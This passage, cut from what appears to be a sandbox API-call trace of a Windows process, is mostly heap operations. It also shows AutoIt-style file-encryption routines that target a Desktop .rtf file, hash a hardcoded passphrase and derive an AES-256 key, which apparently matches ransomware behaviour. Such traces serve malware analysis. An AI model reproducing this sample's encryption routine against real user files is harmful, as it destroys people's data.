dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0119.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0119.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0119.602] CloseHandle (hObject=0x2a0) returned 1 [0119.603] FreeLibrary (hLibModule=0x772d0000) returned 1 [0119.603] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0119.603] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348b92b0, ftCreationTime.dwHighDateTime=0x1d5ef1d, ftLastAccessTime.dwLowDateTime=0x2fccd30, ftLastAccessTime.dwHighDateTime=0x1d5ef28, ftLastWriteTime.dwLowDateTime=0x2fccd30, ftLastWriteTime.dwHighDateTime=0x1d5ef28, nFileSizeHigh=0x0, nFileSizeLow=0x22f8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="5NSsZwi6b.rtf", cAlternateFileName="5NSSZW~1.RTF")) returned 0x41ac040 [0119.603] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0119.603] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0119.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0119.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0119.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0119.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0119.603] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0119.605] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0119.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.605] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0119.605] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.605] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0119.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0119.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0119.605] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0119.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0119.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0119.605] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0119.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.606] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca9b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0119.606] CryptHashData (hHash=0x41ac500, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0119.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.606] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0119.606] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca808, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0119.606] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0119.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0119.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0119.608] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0119.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacb8 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0119.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0119.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0119.610] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0119.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0119.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0119.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0119.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e48 [0119.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0119.612] CryptDestroyHash (hHash=0x41ac500) returned 1 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0119.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0119.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0119.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0119.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0119.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0119.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0119.614] HeapFree (in: 